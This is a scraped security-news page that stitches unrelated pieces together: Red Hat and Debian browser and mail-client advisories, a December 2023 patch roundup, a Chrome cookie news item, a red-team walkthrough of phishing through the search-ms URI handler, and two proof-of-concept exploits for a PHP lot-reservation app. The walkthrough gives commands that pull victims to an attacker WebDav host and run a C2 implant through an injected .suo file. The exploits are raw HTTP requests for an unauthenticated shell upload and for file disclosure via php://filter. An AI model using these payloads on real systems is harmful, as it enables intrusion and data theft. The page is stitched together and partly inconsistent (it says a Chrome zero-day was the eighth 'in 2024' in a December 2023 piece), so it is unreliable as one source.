Red Hat Security Advisory 2024-0004-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include buffer overflow and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0004.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:0004-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0004  
Issue date:         2024-01-02  
Revision:           03  
CVE Names:          CVE-2023-6856  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.6.0.

Security Fix(es):

* Mozilla: Heap-buffer-overflow affecting WebGL <code>DrawElementsInstanced</code> method with Mesa VM driver (CVE-2023-6856)

* Mozilla: Memory safety bugs fixed in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6 (CVE-2023-6864)

* Mozilla: S/MIME signature accepted despite mismatching message date (CVE-2023-50761)

* Mozilla: Truncated signed text was shown with a valid OpenPGP signature (CVE-2023-50762)

* Mozilla: Symlinks may resolve to smaller than expected buffers (CVE-2023-6857)

* Mozilla: Heap buffer overflow in <code>nsTextFragment</code> (CVE-2023-6858)

* Mozilla: Use-after-free in PR_GetIdentitiesLayer (CVE-2023-6859)

* Mozilla: Potential sandbox escape due to <code>VideoBridge</code> lack of texture validation (CVE-2023-6860)

* Mozilla: Heap buffer overflow affected <code>nsWindow::PickerOpen(void)</code> in headless mode (CVE-2023-6861)

* Mozilla: Use-after-free in <code>nsDNSService</code> (CVE-2023-6862)

* Mozilla: Undefined behavior in <code>ShutdownObserver()</code> (CVE-2023-6863)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6856

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2255360  
https://bugzilla.redhat.com/show_bug.cgi?id=2255362  
https://bugzilla.redhat.com/show_bug.cgi?id=2255363  
https://bugzilla.redhat.com/show_bug.cgi?id=2255364  
https://bugzilla.redhat.com/show_bug.cgi?id=2255365  
https://bugzilla.redhat.com/show_bug.cgi?id=2255367  
https://bugzilla.redhat.com/show_bug.cgi?id=2255368  
https://bugzilla.redhat.com/show_bug.cgi?id=2255369  
https://bugzilla.redhat.com/show_bug.cgi?id=2255370  
https://bugzilla.redhat.com/show_bug.cgi?id=2255378  
https://bugzilla.redhat.com/show_bug.cgi?id=2255379

Red Hat Security Advisory 2024-0004-03

Red Hat Security Advisory 2024-0002-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include buffer overflow and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0002.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:0002-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0002  
Issue date:         2024-01-02  
Revision:           03  
CVE Names:          CVE-2023-6856  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.6.0.

Security Fix(es):

* Mozilla: Heap-buffer-overflow affecting WebGL <code>DrawElementsInstanced</code> method with Mesa VM driver (CVE-2023-6856)

* Mozilla: Memory safety bugs fixed in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6 (CVE-2023-6864)

* Mozilla: S/MIME signature accepted despite mismatching message date (CVE-2023-50761)

* Mozilla: Truncated signed text was shown with a valid OpenPGP signature (CVE-2023-50762)

* Mozilla: Symlinks may resolve to smaller than expected buffers (CVE-2023-6857)

* Mozilla: Heap buffer overflow in <code>nsTextFragment</code> (CVE-2023-6858)

* Mozilla: Use-after-free in PR_GetIdentitiesLayer (CVE-2023-6859)

* Mozilla: Potential sandbox escape due to <code>VideoBridge</code> lack of texture validation (CVE-2023-6860)

* Mozilla: Heap buffer overflow affected <code>nsWindow::PickerOpen(void)</code> in headless mode (CVE-2023-6861)

* Mozilla: Use-after-free in <code>nsDNSService</code> (CVE-2023-6862)

* Mozilla: Undefined behavior in <code>ShutdownObserver()</code> (CVE-2023-6863)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6856

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2255360  
https://bugzilla.redhat.com/show_bug.cgi?id=2255362  
https://bugzilla.redhat.com/show_bug.cgi?id=2255363  
https://bugzilla.redhat.com/show_bug.cgi?id=2255364  
https://bugzilla.redhat.com/show_bug.cgi?id=2255365  
https://bugzilla.redhat.com/show_bug.cgi?id=2255367  
https://bugzilla.redhat.com/show_bug.cgi?id=2255368  
https://bugzilla.redhat.com/show_bug.cgi?id=2255369  
https://bugzilla.redhat.com/show_bug.cgi?id=2255370  
https://bugzilla.redhat.com/show_bug.cgi?id=2255378  
https://bugzilla.redhat.com/show_bug.cgi?id=2255379

Red Hat Security Advisory 2024-0002-03

Red Hat Security Advisory 2024-0001-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9. Issues addressed include buffer overflow and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0001.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:0001-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0001  
Issue date:         2024-01-02  
Revision:           03  
CVE Names:          CVE-2023-6856  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.6.0.

Security Fix(es):

* Mozilla: Heap-buffer-overflow affecting WebGL <code>DrawElementsInstanced</code> method with Mesa VM driver (CVE-2023-6856)

* Mozilla: Memory safety bugs fixed in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6 (CVE-2023-6864)

* Mozilla: S/MIME signature accepted despite mismatching message date (CVE-2023-50761)

* Mozilla: Truncated signed text was shown with a valid OpenPGP signature (CVE-2023-50762)

* Mozilla: Symlinks may resolve to smaller than expected buffers (CVE-2023-6857)

* Mozilla: Heap buffer overflow in <code>nsTextFragment</code> (CVE-2023-6858)

* Mozilla: Use-after-free in PR_GetIdentitiesLayer (CVE-2023-6859)

* Mozilla: Potential sandbox escape due to <code>VideoBridge</code> lack of texture validation (CVE-2023-6860)

* Mozilla: Heap buffer overflow affected <code>nsWindow::PickerOpen(void)</code> in headless mode (CVE-2023-6861)

* Mozilla: Use-after-free in <code>nsDNSService</code> (CVE-2023-6862)

* Mozilla: Undefined behavior in <code>ShutdownObserver()</code> (CVE-2023-6863)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6856

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2255360  
https://bugzilla.redhat.com/show_bug.cgi?id=2255362  
https://bugzilla.redhat.com/show_bug.cgi?id=2255363  
https://bugzilla.redhat.com/show_bug.cgi?id=2255364  
https://bugzilla.redhat.com/show_bug.cgi?id=2255365  
https://bugzilla.redhat.com/show_bug.cgi?id=2255367  
https://bugzilla.redhat.com/show_bug.cgi?id=2255368  
https://bugzilla.redhat.com/show_bug.cgi?id=2255369  
https://bugzilla.redhat.com/show_bug.cgi?id=2255370  
https://bugzilla.redhat.com/show_bug.cgi?id=2255378  
https://bugzilla.redhat.com/show_bug.cgi?id=2255379

Red Hat Security Advisory 2024-0001-03

Microsoft search protocol enables clients to initiate connections against an enterprise search service such as SharePoint or WebDav. During these search connections the protocol server… 
Continue reading → Initial Access – search-ms URI Handler

Microsoft search protocol enables clients to initiate connections against an enterprise search service such as SharePoint or WebDav. During these search connections the protocol server will respond with a list of items which are relevant to the search query. The SOAP message protocol is used to format request and response messages during a search query over the HTTP or HTTPS protocol. When the _search-ms_ URI handler is used in Microsoft Edge in order to search a file in a target web server this will enforce Windows explorer to start in order to list the results. This behavior can be used in conjunction with phishing in order to enforce target users to visit arbitrary URL’s hosting malicious files in order to get initial access.

Microsoft is utilizing Mark of the Web (MotW) in Windows environments to indicate that a file is originated from the Internet. On that basis files are being prevented from download by Windows SmartScreen and prompt the user with an additional message about the risks of opening an non-trusted file. Trellix discovered that a threat actor is combining a chain of techniques in order to bypass Mark of the Web and trick the users to open malicious attachments from a WebDav server using the _ms-search_ protocol. Essentially, chaining Windows Search Protocol handler with WebDav and AppDomainManager Injection or with a programming file such as .NET can enable red teams to evade any warnings to the users, bypass controls during implant delivery for initial access as these do not apply Mark of the Web (MotW).

In order to mimic the threat actor approach a WebDav server is required that will host the arbitrary file. Executing the command below will initiate a WebDav server:

    wsgidav --port=80 --host=0.0.0.0 --root=. --auth=anonymous

WebDav Server

Querying the registry _HKEY\_CLASSES\_ROOT_ will identify all Microsoft handlers which can register a URL. For example using the protocol handler and the URL like _identifier://URL_ will cause Windows to call the registered application to handle the action.

Get-Item Registry::HKEY\_CLASSES\_ROOT\\ms-\* | Out-String | select-string -Pattern "URL" -SimpleMatch

Search URI Handler – Registry Search

In a red team scenario the following string will enforce Windows to connect to the remote WebDav server via the HTTP protocol, filter a specific file type (.sln) and hide the actual path with the _displayname_ value. A popup notification will appear to the user that the website is trying to open windows explorer. It should be noted that this will not work in other browsers like Firefox unless a browser redirection is utilized.

    search-ms:query=.sln&crumb=location:\\10.0.0.3\DavWWWRoot\application&displayname=pentestlaboratories

Search URL Handler – Edge

Since visual studio projects doesn’t apply Mark of the Web, therefore injecting an arbitrary command into the _.suo_ (Studio User Options) file will cause code execution if it is blend in with a visual studio solution project file. A proof of concept exists which can be used to perform the command injection.

    suo_exploit_test.exe input.suo injected.suo cmd /c C:\tmp\demon.x64.exe

Search URI Handler – .suo

Using a visual studio solution file will ignore MotW and therefore any warnings that the file is originated from the Internet or from SmartScreen will not presented to the user.

Search URL Handler – Visual Studio Solution

When the target user opens the solution file, visual studio will start as normal and the code will executed in the background.

Search URI Handler – Visual Studio

As a result a communication will established with the command and control framework.

Search URI Handler – Implant

It is not uncommon if the target user is a developer to have more rights compare to standard users. Therefore user permissions should be checked during situational awareness by running _whoami_ to determine the privileges of the user who executed the file.

Search URI Handler – whoami

It should be noted that the WebClient service will start (by default is not running in Windows 10) and therefore it could be chained with other active directory attacks (depending on the domain configuration) to perform elevation of privileges or lateral movement.

Search URI Handler – WebClient Service

An alternative approach could be to directly serve a malicious executable instead of a _.sln_ file.

Search URI Handler – Executable

However, in that occasion Mark of the Web will applied and a message will inform the user that the file is originated outside of the network and could harm the computer.

Search URI Handler – MotW

However, if the use ignores the message and choose to run the file an implant will received to the C2 framework.

Search URI Handler – Implant

Instead of using programming files, arbitrary office files could be also used as these will evade also any email filtering solutions.

    search-ms:query=.xlsx&crumb=location:\\10.0.0.3\DavWWWRoot\Update&displayname=Update

Search URI Handler – Excel

When windows explorer opens the computer will connect to the remote WebDav server which hosts the file and once the user opens the file code will executed.

Search URI Handler – Excel via WebDav

Office documents also accept URI’s and therefore could be used to trick the user to open the malicious attachment.

    ms-excel:ofv|u|http://10.0.0.3/Book1.xlsx

Excel Handler

In all of the cases pretext is necessary and important part of social engineering to convince the user to open the file. The above methods could be used as a method to deliver files in order to get initial access by evading common methods such as sending email attachments to users that might be prevented by the email filtering control.

**References**

1.  https://github.com/mar10/wsgidav
2.  https://github.com/moom825/visualstudio-suo-exploit
3.  https://twitter.com/hackerfantastic/status/1531793396423176193
4.  https://www.trellix.com/about/newsroom/stories/research/beyond-file-search-a-novel-method/
5.  https://badoption.eu/blog/2023/12/21/RedirectChain.html

**Post navigation**

Initial Access – search-ms URI Handler

Plus: Apple shuts down a Flipper Zero Attack, Microsoft patches more than 30 vulnerabilities, and more critical updates for the last month of 2023.

December was a hectic month for updates as firms including Apple and Google rushed to get patches out to fix serious flaws in their products before the holiday break.

Enterprise software giants also issued their fair share of patches, with Atlassian and SAP squashing several critical bugs during December.

Here’s what you need to know about the important updates you might have missed during the month.

Apple iOS

In mid-December, Apple released iOS 17.2, a major point upgrade containing features such as the Journal app, as well as 12 security patches. Among the flaws fixed in iOS 17.2 is CVE-2023-42890, an issue in the WebKit browser engine that could allow an attacker to execute code.

Another flaw in the iPhone’s Kernel, tracked as CVE-2023-4291, could see an app break out of its secure sandbox, Apple wrote on its support page. Meanwhile, two vulnerabilities in ImageIO, CVE-2023-42898 and CVE-2023-42899, could lead to code execution.

The iOS 17.2 update also put a mechanism in place to prevent a Bluetooth attack using a penetration testing device called Flipper Zero, according to tests by ZDNET and 9to5Mac. The annoying denial of service cyber-assault could cause a flurry of pop ups to appear on an iPhone and eventually lock up the device.

Apple also released iOS 16.7.3, Safari 17.2, macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2, tvOS 17.2 and watchOS 10.2.

Just one week after releasing iOS 17.2, Apple issued iOS 17.2.1 and iOS 16.7.4 for older devices, alongside macOS Sonoma 14.2.1. The surprise iPhone update contains unspecified bug and security fixes, while the macOS patch fixes a single flaw tracked as CVE-2023-42940.

Google Android

The Google Android December Security Bulletin was a hefty one, fixing nearly 100 security issues. The update includes patches for two critical issues in the Framework, the most severe of which could lead to remote escalation of privilege with no additional privileges needed. User interaction is not needed for exploitation, Google said.

CVE-2023-40088 is a critical flaw in the System that could lead to remote code execution, while CVE-2023-40078 is an elevation of privilege bug rated as having a high impact.

Google has also issued an update for its smart device WearOS platform, fixing CVE-2023-40094, an elevation of privilege flaw. The Pixel Security Bulletin has not been posted at the time of writing.

Google Chrome

Google ended a bumper December of updates in style with an emergency fix for its Chrome browser. The eighth zero-day vulnerability impacting Chrome in 2024, CVE-2023-7024 is a heap buffer overflow issue in the open source WebRTC component. Google is “aware that an exploit for CVE-2023-7024 exists in the wild,” the browser maker said in an advisory.

It wasn’t the first fix released by Google in December. The software giant also issued a Chrome patch mid-month to fix nine security issues. Of the flaws reported by external researchers, five are rated as having a high severity, including CVE-2023-6702, a type confusion flaw in V8, and four use-after-free bugs.

Earlier in the month Google released Chrome 120, fixing 10 security flaws, including two rated as having a high severity. CVE-2023-6508 is a use-after-free bug in Media Stream, while CVE-2023-6509 is a use-after-free issue in Side Panel Search.

Microsoft

Microsoft’s December Patch Tuesday fixes over 30 vulnerabilities including several remote code execution (RCE) flaws. Among the critical fixes is CVE-2023-36019, a spoofing vulnerability in Microsoft Power Platform Connector with a CVSS score of 9.6. The issue could see an attacker manipulate a malicious link, app, or file to trick the victim. However, you would have to click on a specially crafted URL to be compromised.

Meanwhile, CVE-2023-35628 is a Windows MSHTML Platform RCE bug rated as critical with a CVSS score of 8.1. “The attacker could exploit this vulnerability by sending a specially crafted email which triggers automatically when it is retrieved and processed by the Outlook client,” Microsoft said, adding that this could lead to exploitation before the email is viewed in the Preview Pane.

It was a fairly light Patch Tuesday, and none of the issues fixed in the month’s update cycle are known to have been exploited, but it still makes sense to apply the fixes as soon as you can.

Mozilla Firefox

Mozilla has fixed 18 security vulnerabilities in its Firefox browser, a third of which are rated as having a high severity. Of these, CVE-2023-6856 is a heap-buffer-overflow issue affecting WebGL DrawElementsInstanced method with Mesa VM driver that could allow an attacker to perform remote code execution and sandbox escape.

Meanwhile, Mozilla has also fixed memory safety bugs tracked as CVE-2023-6864 and CVE-2023-6873. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort \[they\] could have been exploited to run arbitrary code,” Mozilla said.

Apache

The Apache Software Foundation has issued a patch for a flaw in its Struts 2 open source developer framework. Tracked as CVE-2023-50164, the issue is rated as critical with a CVSS score of 9.8.

Using the vulnerability, an attacker could manipulate file upload parameters to enable paths traversal. Under some circumstances, this could lead to uploading a malicious file and be used to perform RCE, according to a security advisory.

To fix the flaw, it’s important to upgrade to Struts 2.5.33 or Struts 6.3.0.2 as soon as possible.

Atlassian

Enterprise software giant Atlassian has issued a patch to fix critical RCE vulnerabilities in its Confluence Data Center and Server. Tracked as CVE-2023-22522, the template injection vulnerability allows an authenticated attacker to inject unsafe user input into a Confluence page. “Using this approach, an attacker is able to achieve RCE on an affected instance,” Atlassian said in an advisory.

Marked as critical with a CVSS score of 9, the bug affects all versions including and after 4.0.0 of Confluence Data Center and Server. Atlassian “recommends patching to the latest version or a fixed LTS version” to address the issue.

Other patches released by Atlassian during the month include a fix for an RCE vulnerability in the Atlassian macOS app, an RCE bug in Assets Discovery, and a SnakeYAML library RCE issue impacting multiple products.

SAP

Business software maker SAP has released its December Security Patch Day, fixing several serious security flaws. The most critical, with a CVSS score of 9.1, are four escalation-of-privilege bugs in SAP Business Technology Platform tracked as CVE-2023-49583, CVE-2023-50422, CVE-2023-50423, and CVE-2023-50424.

“It allows an unauthenticated attacker to obtain arbitrary permissions within the application leading to high impact on the application’s confidentiality and integrity,” security firm Onapsis said.

Meanwhile, CVE-2023-42481 is an improper access control vulnerability in SAP Commerce Cloud with a CVSS score of 8.1. “This allows a user who is actually blocked to regain access to the application, leading to considerable impact on confidentiality and integrity,” according to Onapsis.

Google Fixes Nearly 100 Android Security Issues

Lot Reservation Management System version 1.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution# Google Dork: N/A# Date: 10th December 2023# Exploit Author: Elijah Mandila Syoyi# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip# Version: 1.0# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0# CVE : N/ADeveloper description about application purpose:-------------------------------------------------------------------------------------------------------------------------------------------------------------------AboutThe Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.------------------------------------------------------------------------------------------------------------------------------------------------------------------Vulnerability:-The application does not properly verify authentication information and file types before files upload. This can allow an attacker to bypass authentication and file checking and upload malicious file to the server. There is an open directory listing where uploaded files are stored, allowing an attacker to open the malicious file in PHP, and will be executed by the server.Proof of Concept:-(HTTP POST Request)POST /lot/admin/ajax.php?action=save_division HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------217984066236596965684247013027Content-Length: 606Origin: http://192.168.150.228Connection: closeReferer: http://192.168.150.228/lot/admin/index.php?page=divisions-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="id"-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="name"sample-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="description"sample-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="img"; filename="phpinfo.php"Content-Type: application/x-php<?php phpinfo() ?>-----------------------------217984066236596965684247013027--Check your uploaded file/shell in "http://192.168.150.228/lot/admin/assets/uploads/maps/". Replace the IP Addresses with the victim IP address.

Lot Reservation Management System 1.0 Shell Upload

Lot Reservation Management System version 1.0 suffers from a file disclosure vulnerability.

    # Exploit Title: Lot Reservation Management System Unauthenticated File Disclosure Vulnerability# Google Dork: N/A# Date: 10th December 2023# Exploit Author: Elijah Mandila Syoyi# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip# Version: 1.0# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0# CVE : N/ADeveloper description about application purpose:-------------------------------------------------------------------------------------------------------------------------------------------------------------------AboutThe Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.------------------------------------------------------------------------------------------------------------------------------------------------------------------Vulnerability:-The application is vulnerable to PHP source code disclosure vulnerability. This can be abused by an attacker to disclose sensitive PHP files within the application and also outside the server root. PHP conversion to base64 filter will be used in this scenario.Proof of Concept:-(HTTP POST Request)GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Cookie: PHPSESSID=o59sqrufi4171o8bkbmf1aq9snUpgrade-Insecure-Requests: 1The same can be achieved by removing the PHPSESSID cookie as below:-GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Upgrade-Insecure-Requests: 1The file requested will be returned in base64 format in returned HTTP response.The attack can also be used to traverse directories to return files outside the web root.GET /lot/index.php?page=php://filter/convert.base64-encode/resource=D:\test HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Upgrade-Insecure-Requests: 1This will return test.php file in the D:\ directory.

Lot Reservation Management System 1.0 File Disclosure

Debian Linux Security Advisory 5581-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, sandbox escape or clickjacking.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5581-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 20, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2023-6856 CVE-2023-6857 CVE-2023-6858 CVE-2023-6859                  CVE-2023-6860 CVE-2023-6861 CVE-2023-6862 CVE-2023-6863                  CVE-2023-6864 CVE-2023-6865 CVE-2023-6867Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, sandbox escape or clickjacking.For the oldstable distribution (bullseye), these problems have been fixedin version 115.6.0esr-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 115.6.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWDPxAACgkQEMKTtsN8TjYfeRAAql+aZ6PpAM1Fq4Cp1IlvDQc8BYNuKrjn9/4xYgq/bAnQyRGj1I0viHP2dUdZl6CcndqE6NVgm1mYpCQ/TZJpwSSxnoXf46bB/lGNg17Cw7T8gWI5uUSs1K63UOYNMr8HlCF35qZpU0+TrsL+q3qRdkOQOxRLSFHNhxuUQ+44pUJYKDVg6vKjHU91oQEfjzmcgn2Z+tL/zyrt4s57XUGpZNm6Vmg/TUftXL5+CDodCNPRnIw0JBYWu2yfJ3tj6cuCw6jDAcAouAsDcd8CbK28Bf6h2zUossRGVjSfNWeoshK2qe9L3/wlQB62s0wrJ1MimP9k1y9xS4Iy85vf2BDDnVQBNgMR8mKnwt63Jhngpx8JW8oTbBKzx1oiEZkShw3CDWuCx7ooMnR8glwybPJqXMyZbt8H7dMO3IFEwD2dfNzVfwyEUq4JAOzCPasLEwCekXrTTxeZoYdTW4y8c5c4GEd9nvO8Hdk9iV/zbD1uhpgy0g6oQXciAzSH6Rm92u2+HPwNOFjZAJMOi9eyqtdj9PqwHZ1uraXhtqCz8peD/Sg+YZCAXt0lLyVM+WbQqJOyH5n1POeEHbEikv1iMLXRw+Vkkbzr3u9laTdQ9Yn1b/ZfVblG6/N+hhlLLXYBXyYfrU4L6DMTnUave299Cq1fb8RPWVefcqAv6DoQX0P1GHc==8/zE-----END PGP SIGNATURE-----

Debian Security Advisory 5581-1

Google on Thursday announced that it will start testing a new feature called "Tracking Protection" starting January 4, 2024, to 1% of Chrome users as part of its efforts to deprecate third-party cookies in the web browser.
The setting is designed to limit "cross-site tracking by restricting website access to third-party cookies by default," Anthony Chavez, vice president of Privacy

Google on Thursday announced that it will start testing a new feature called "Tracking Protection" starting January 4, 2024, to 1% of Chrome users as part of its efforts to deprecate third-party cookies in the web browser.

The setting is designed to limit "cross-site tracking by restricting website access to third-party cookies by default," Anthony Chavez, vice president of Privacy Sandbox at Google, said.

The tech giant noted that participants for Tracking Protection will be selected at random and that chosen users will be notified upon opening Chrome on either a desktop or an Android device.

The goal is to restrict third-party cookies (also called "non-essential cookies") by default, preventing them from being used to track users as they move from one website to the other for serving personalized ads.

While several major browsers like Apple Safari and Mozilla Firefox have either already placed restrictions on third-party cookies via features like Intelligent Tracking Prevention (ITP) and Enhanced Tracking Protection in Firefox, Google is taking more of a middle-ground approach that involves devising alternatives where users can access free online content and services without compromising on their privacy.

In mid-October 2023, Google confirmed its plans to "disable third-party cookies for 1% of users from Q1 2024 to facilitate testing, and then ramp up to 100% of users from Q3 2024."

Privacy Sandbox, instead of providing a cross-site or cross-app user identifier, "aggregates, limits, or noises data" through APIs like Protected Audience (formerly FLEDGE), Topics, and Attribution Reporting to help prevent user re-identification.

In doing so, the goal is to block third-parties from tracking user browsing behavior across sites, while still allowing sites and apps to serve relevant ads and enabling advertisers to measure the performance of their online ads without using individual identifiers.

"With Tracking Protection, Privacy Sandbox and all of the features we launch in Chrome, we'll continue to work to create a web that's more private than ever, and universally accessible to everyone," Chavez said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#firefox